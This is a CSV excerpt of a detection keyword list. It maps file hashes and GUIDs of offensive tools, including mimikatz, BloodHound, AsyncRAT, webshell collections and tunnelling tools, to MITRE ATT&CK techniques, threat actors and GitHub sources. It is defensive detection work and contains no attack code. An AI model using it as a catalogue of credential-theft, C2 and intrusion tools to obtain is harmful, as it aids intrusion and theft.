"*0d45502cdd00e1f2a8864ef450dc532497f817f7596c105933e1eb9054186bf3*",".{0,1000}0d45502cdd00e1f2a8864ef450dc532497f817f7596c105933e1eb9054186bf3.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","21619"
"*0d4ab1674ad2b13652979d996a41f55a353eb2f32f854a95c7068e66c072f63c*",".{0,1000}0d4ab1674ad2b13652979d996a41f55a353eb2f32f854a95c7068e66c072f63c.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","21620"
"*0d567a5d498809a5595567f9b172fec85c7bd4911da60ce4f2f1729de0bed739*",".{0,1000}0d567a5d498809a5595567f9b172fec85c7bd4911da60ce4f2f1729de0bed739.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21621"
"*0d624761a03e400013f8372b931e658ceafef28f87574fc3af0421264ebbcb09*",".{0,1000}0d624761a03e400013f8372b931e658ceafef28f87574fc3af0421264ebbcb09.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","21622"
"*0d6730ca52c1a887006e318a677aa70ed059c67c4bb82af56fec792b2a72e1c9*",".{0,1000}0d6730ca52c1a887006e318a677aa70ed059c67c4bb82af56fec792b2a72e1c9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21623"
"*0d6ab504d6e011e57dad5e5173dcfe3d7e1234ad3edaf880437071eaad3c2550*",".{0,1000}0d6ab504d6e011e57dad5e5173dcfe3d7e1234ad3edaf880437071eaad3c2550.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21624"
"*0d6fe7acb2fe628db16ac731cea9e9e0d430ff5bbc5f04cfd6700b58ea54c168*",".{0,1000}0d6fe7acb2fe628db16ac731cea9e9e0d430ff5bbc5f04cfd6700b58ea54c168.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","21625"
"*0d72b72773bb854b9dcdc83c5a0f76bcc5a6a1a344f28f81500d6aaaf8d2e69d*",".{0,1000}0d72b72773bb854b9dcdc83c5a0f76bcc5a6a1a344f28f81500d6aaaf8d2e69d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21626"
"*0d756650eb56b7e3ffc5f27c01933fb3b4ada09b77b77959ea4178a0f46fc8c8*",".{0,1000}0d756650eb56b7e3ffc5f27c01933fb3b4ada09b77b77959ea4178a0f46fc8c8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21627"
"*0d773444d899ab08f8aaee56dec0fb17928784dca205ef25af61a71bf4fb6e3f*",".{0,1000}0d773444d899ab08f8aaee56dec0fb17928784dca205ef25af61a71bf4fb6e3f.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","21628"
"*0d83ecf5fae3ecc043b537d33c162d01c6a1171eb27e2e3862e8cc7df328830c*",".{0,1000}0d83ecf5fae3ecc043b537d33c162d01c6a1171eb27e2e3862e8cc7df328830c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21631"
"*0d8cac6cbe2019d99a5260f4c934d9a4c9c7022d141006cfc0f87fdc3f8ae4ab*",".{0,1000}0d8cac6cbe2019d99a5260f4c934d9a4c9c7022d141006cfc0f87fdc3f8ae4ab.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","21633"
"*0d8d349782ea9510389351185bac60105d17c181a9271f7ab99f6d2c886eda7e*",".{0,1000}0d8d349782ea9510389351185bac60105d17c181a9271f7ab99f6d2c886eda7e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21634"
"*0d8e9a6a82a88a754aee39087957d95fa2cf4dae8a0b931e61934b69bfc4c491*",".{0,1000}0d8e9a6a82a88a754aee39087957d95fa2cf4dae8a0b931e61934b69bfc4c491.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21635"
"*0d8f5888bc6e02085496b4a070b39169bdea67051b1a9f7af21b29de9615842e*",".{0,1000}0d8f5888bc6e02085496b4a070b39169bdea67051b1a9f7af21b29de9615842e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21637"
"*0da34db46173eeb7c06ceb9732d5006a6463c802c5ac9bf2b0e40084b207f760*",".{0,1000}0da34db46173eeb7c06ceb9732d5006a6463c802c5ac9bf2b0e40084b207f760.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21639"
"*0da3621a6676dcb4ac7e260ea7280a14d05c9bcc02c0a296a6507172a3cc7bd8*",".{0,1000}0da3621a6676dcb4ac7e260ea7280a14d05c9bcc02c0a296a6507172a3cc7bd8.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21640"
"*0da9a753ed44b2716f2434ef664cf46c3ece2b7d5fc1ce810800dd8d23996113*",".{0,1000}0da9a753ed44b2716f2434ef664cf46c3ece2b7d5fc1ce810800dd8d23996113.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","21641"
"*0dayCTF/reverse-shell-generator*",".{0,1000}0dayCTF\/reverse\-shell\-generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","21642"
"*0db0228defb8d913de486d4f799be97bc75b5aa2ae72c2fc1e99389aeb92b170*",".{0,1000}0db0228defb8d913de486d4f799be97bc75b5aa2ae72c2fc1e99389aeb92b170.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","21643"
"*0db3092377cd7af2f253b637374742921b7db93b6d395ede84a826a14d2ad7cb*",".{0,1000}0db3092377cd7af2f253b637374742921b7db93b6d395ede84a826a14d2ad7cb.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21644"
"*0db6b9e5973f2dd2d84c417208e3fcd2d03dad3fd981028a2ded5ff9969ca325*",".{0,1000}0db6b9e5973f2dd2d84c417208e3fcd2d03dad3fd981028a2ded5ff9969ca325.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21646"
"*0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9*",".{0,1000}0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21647"
"*0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9*",".{0,1000}0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21648"
"*0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9*",".{0,1000}0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21649"
"*0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9*",".{0,1000}0db7123a79bba0227e8f91d34847ccee8be3edac266c38e804344b957486fdb9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21650"
"*0dbce336ba4f98f26b89fc110bee0b43aed24002c2fba5df9a7675d168aad12d*",".{0,1000}0dbce336ba4f98f26b89fc110bee0b43aed24002c2fba5df9a7675d168aad12d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21651"
"*0dbf95a658e7bb4b339b218820a894d06c8fe755e2cff0681a5456ca5b1b5723*",".{0,1000}0dbf95a658e7bb4b339b218820a894d06c8fe755e2cff0681a5456ca5b1b5723.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21653"
"*0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff*",".{0,1000}0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21656"
"*0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2*",".{0,1000}0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21657"
"*0dcb4aca167ac5f020dc3b55e8db707560a592152131fd78484392172107b688*",".{0,1000}0dcb4aca167ac5f020dc3b55e8db707560a592152131fd78484392172107b688.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21658"
"*0dcbd6cce79f768d9e9b79bc8c86be279779120b8232e32c1f3198ee56653518*",".{0,1000}0dcbd6cce79f768d9e9b79bc8c86be279779120b8232e32c1f3198ee56653518.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21659"
"*0DD419E5-D7B3-4360-874E-5838A7519355*",".{0,1000}0DD419E5\-D7B3\-4360\-874E\-5838A7519355.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","21660"
"*0dd41d5c99202fa4387bb5b9db7ce55236fc913b65e3a9fb58f697d3480f14ef*",".{0,1000}0dd41d5c99202fa4387bb5b9db7ce55236fc913b65e3a9fb58f697d3480f14ef.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21661"
"*0dd54eef6deb3608d8e9b119c526cd6b1311c3256006f331f6646022cabf4fae*",".{0,1000}0dd54eef6deb3608d8e9b119c526cd6b1311c3256006f331f6646022cabf4fae.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21662"
"*0ddeb7336ac9bd123fe9fa3713066dc00b676aa8c0be0d7191732fa3e6602111*",".{0,1000}0ddeb7336ac9bd123fe9fa3713066dc00b676aa8c0be0d7191732fa3e6602111.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21663"
"*0de61f6d712f44fd8337794c3d933d3e0de24bae9235383904541997c604b47a*",".{0,1000}0de61f6d712f44fd8337794c3d933d3e0de24bae9235383904541997c604b47a.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","#filehash","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","21664"
"*0DE8DA5D-061D-4649-8A56-48729CF1F789*",".{0,1000}0DE8DA5D\-061D\-4649\-8A56\-48729CF1F789.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#GUIDproject","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","21665"
"*0dece401c686c54a06aba232c7bf4f80b49e4087aed13078c4721676341db992*",".{0,1000}0dece401c686c54a06aba232c7bf4f80b49e4087aed13078c4721676341db992.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","21667"
"*0dedf25f9bae707cb1cd5fc106f4516dc0ce7d8bf2114b50afeb6d2fbe506466*",".{0,1000}0dedf25f9bae707cb1cd5fc106f4516dc0ce7d8bf2114b50afeb6d2fbe506466.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21668"
"*0defeb7a564d2f4f237d89ae63065e78af68b0febda5927f25722696593bf42e*",".{0,1000}0defeb7a564d2f4f237d89ae63065e78af68b0febda5927f25722696593bf42e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21669"
"*0df149772508a04604ef6e5a1bd46715b95c81bd327e0ab9ca912d82a0bc82b4*",".{0,1000}0df149772508a04604ef6e5a1bd46715b95c81bd327e0ab9ca912d82a0bc82b4.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21670"
